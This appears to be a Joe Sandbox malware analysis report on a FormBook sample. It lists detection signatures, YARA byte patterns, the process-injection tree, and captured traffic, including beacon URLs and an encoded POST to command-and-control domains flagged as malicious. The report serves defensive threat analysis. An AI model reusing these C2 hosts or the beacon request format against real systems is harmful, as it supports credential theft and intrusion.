Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
plZuPtZoTk.exe

Overview

General Information

Sample name:plZuPtZoTk.exe
renamed because original name is a hash value
Original sample name:5dd59f906130866850ab2c712dae59d43c0e0e30a6554022567957037c35dc28.exe
Analysis ID:1588857
MD5:03473468fd10d42dd617a426dcffa92d
SHA1:c1055cc7420cf9f54de46dc813920f34051e7131
SHA256:5dd59f906130866850ab2c712dae59d43c0e0e30a6554022567957037c35dc28
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • plZuPtZoTk.exe (PID: 5328 cmdline: "C:\Users\user\Desktop\plZuPtZoTk.exe" MD5: 03473468FD10D42DD617A426DCFFA92D)
    • svchost.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\plZuPtZoTk.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • GtDTOqzvEb.exe (PID: 5932 cmdline: "C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 6136 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • GtDTOqzvEb.exe (PID: 5220 cmdline: "C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4524 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bb60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13cdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bb60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13cdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x161b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ee33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16fb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\plZuPtZoTk.exe", CommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", ParentImage: C:\Users\user\Desktop\plZuPtZoTk.exe, ParentProcessId: 5328, ParentProcessName: plZuPtZoTk.exe, ProcessCommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", ProcessId: 6644, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\plZuPtZoTk.exe", CommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", ParentImage: C:\Users\user\Desktop\plZuPtZoTk.exe, ParentProcessId: 5328, ParentProcessName: plZuPtZoTk.exe, ProcessCommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", ProcessId: 6644, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.ngmr.xyz/qj8y/?dbFX6=JLnL0&1ZqD=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==Avira URL Cloud: Label: malware
            Source: http://www.zz82x.top/fk06/?1ZqD=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==&dbFX6=JLnL0Avira URL Cloud: Label: malware
            Source: http://www.ngmr.xyz/qj8y/Avira URL Cloud: Label: malware
            Source: http://www.zz82x.top/fk06/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: plZuPtZoTk.exeVirustotal: Detection: 37%Perma Link
            Source: plZuPtZoTk.exeReversingLabs: Detection: 65%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: plZuPtZoTk.exeJoe Sandbox ML: detected
            Source: plZuPtZoTk.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GtDTOqzvEb.exe, 00000004.00000002.3281125755.000000000066E000.00000002.00000001.01000000.00000005.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982113880.000000000066E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: plZuPtZoTk.exe, 00000000.00000003.1463967810.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, plZuPtZoTk.exe, 00000000.00000003.1463798414.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812483353.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1814288047.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1914243462.0000000004337000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.000000000467E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.00000000044E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1911769094.000000000418A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: plZuPtZoTk.exe, 00000000.00000003.1463967810.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, plZuPtZoTk.exe, 00000000.00000003.1463798414.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1812483353.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1814288047.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000005.00000003.1914243462.0000000004337000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.000000000467E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.00000000044E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1911769094.000000000418A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.1879019571.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911590267.0000000003400000.00000004.00000020.00020000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282046334.0000000001038000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000005.00000002.3281277788.0000000000686000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3284516753.0000000004B0C000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982686880.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2206667295.0000000004EAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000005.00000002.3281277788.0000000000686000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3284516753.0000000004B0C000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982686880.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2206667295.0000000004EAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.1879019571.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911590267.0000000003400000.00000004.00000020.00020000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282046334.0000000001038000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A2DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A2DBBE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009FC2A2 FindFirstFileExW,0_2_009FC2A2
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A368EE FindFirstFileW,FindClose,0_2_00A368EE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A3698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00A3698F
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A2D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A2D076
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A2D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A2D3A9
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A39642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A39642
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A3979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A3979D
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A39B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00A39B2B
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A35C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00A35C97
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0034C0F0 FindFirstFileW,FindNextFileW,FindClose,5_2_0034C0F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax5_2_00339B60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then pop edi5_2_00352158
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h5_2_043804DE

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.ngmr.xyz
            Source: DNS query: www.030002803.xyz
            Source: DNS query: www.astrafusion.xyz
            Source: Joe Sandbox ViewIP Address: 136.143.186.12 136.143.186.12
            Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
            Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
            Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A3CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00A3CE44
            Source: global trafficHTTP traffic detected: GET /r22w/?1ZqD=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q==&dbFX6=JLnL0 HTTP/1.1Host: www.healthyloveforall.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /fk06/?1ZqD=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==&dbFX6=JLnL0 HTTP/1.1Host: www.zz82x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /mgg3/?1ZqD=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&dbFX6=JLnL0 HTTP/1.1Host: www.ophthalmo.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /qj8y/?dbFX6=JLnL0&1ZqD=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg== HTTP/1.1Host: www.ngmr.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /5x7s/?1ZqD=G72WLubJMS3dcb26AEgi3aGXwYX/pSO4ef8LZR/GCsxFLMdiWd/rxNP93kykZnn+RGVOZz24Lnm2tnjD2KJLN51qk8LIdSpvhcJdwUuCC545HWD+B0z6B0HNWAHTPddxeA==&dbFX6=JLnL0 HTTP/1.1Host: www.specialgift.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /bw0u/?1ZqD=QtOwEWL3Wb8oglkkfuLXaSHSreWpjDtOOnahtC8c9UbbFmMC6Wp+vCjxsEk2BpxEB3gHT+/6vot9OJxtQqkBMHc9XtXTW/yd7EP1snPpVQUS9+gXOgGxj0LXj8PsnCHHkg==&dbFX6=JLnL0 HTTP/1.1Host: www.030002803.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /9hv6/?1ZqD=ggQIo5gV7zHF4RoJrW67zXedyj4Z9AdEETJPM44fUDmvE5zVPN+96oHBfd6Q3012XKsPi7h4Ls5HOMc1y+WXq6tX0X203QdCFZPEDkOrZS9vV9N9P/Prcpb0HgUUjs6D2w==&dbFX6=JLnL0 HTTP/1.1Host: www.2bhp.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /m8yb/?1ZqD=llEfdMF3fC5v4v2APCHuOWcZRuF4MZ+X2MJb9QaOtduFh6ZmbzwgisfO5x3/A5+hir6Uv7mlcSwuThCcifsMM+utKUlvw3RLEUBt7B2DyxaXSuE2zij4fUwZyaVVEgXhww==&dbFX6=JLnL0 HTTP/1.1Host: www.lanxuanz.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficDNS traffic detected: DNS query: www.healthyloveforall.net
            Source: global trafficDNS traffic detected: DNS query: www.bonusgame2024.online
            Source: global trafficDNS traffic detected: DNS query: www.zz82x.top
            Source: global trafficDNS traffic detected: DNS query: www.ophthalmo.cloud
            Source: global trafficDNS traffic detected: DNS query: www.ngmr.xyz
            Source: global trafficDNS traffic detected: DNS query: www.specialgift.asia
            Source: global trafficDNS traffic detected: DNS query: www.030002803.xyz
            Source: global trafficDNS traffic detected: DNS query: www.2bhp.com
            Source: global trafficDNS traffic detected: DNS query: www.lanxuanz.tech
            Source: global trafficDNS traffic detected: DNS query: www.astrafusion.xyz
            Source: unknownHTTP traffic detected: POST /fk06/ HTTP/1.1Host: www.zz82x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.zz82x.topConnection: closeContent-Length: 205Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.zz82x.top/fk06/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Data Raw: 31 5a 71 44 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 62 56 69 6d 6e 38 68 42 6a 73 55 55 78 35 4c 44 4a 43 4c 6c 52 6f 38 43 67 42 69 56 79 75 34 51 56 75 63 66 51 74 73 58 7a 62 43 6a 6a 45 33 63 4d 69 78 4a 32 2b 65 38 6f 2b 4e 42 51 30 77 79 52 4a 70 74 33 61 38 73 74 6a 76 4c 69 4b 50 2b 5a 4b 39 62 70 34 6f 38 6b 4e 36 46 4d 6c 78 55 52 2b 42 6d 6f 73 52 50 51 57 58 35 52 73 75 6b 41 73 45 56 70 2f 5a 74 74 31 78 2f 41 48 5a 6d 71 72 69 49 48 51 43 63 65 6a 38 57 5a 4b 68 4f 66 79 59 31 4a 67 39 36 51 54 4f 56 61 62 7a 49 70 69 4f 4f 6b 38 54 46 4b 6b 78 50 59 6c 68 48 36 4c 36 6d 6b 57 6d 65 7a 4d 3d Data Ascii: 1ZqD=3wyGWJa50eJ6lbVimn8hBjsUUx5LDJCLlRo8CgBiVyu4QVucfQtsXzbCjjE3cMixJ2+e8o+NBQ0wyRJpt3a8stjvLiKP+ZK9bp4o8kN6FMlxUR+BmosRPQWX5RsukAsEVp/Ztt1x/AHZmqriIHQCcej8WZKhOfyY1Jg96QTOVabzIpiOOk8TFKkxPYlhH6L6mkWmezM=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 11 Jan 2025 05:32:14 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 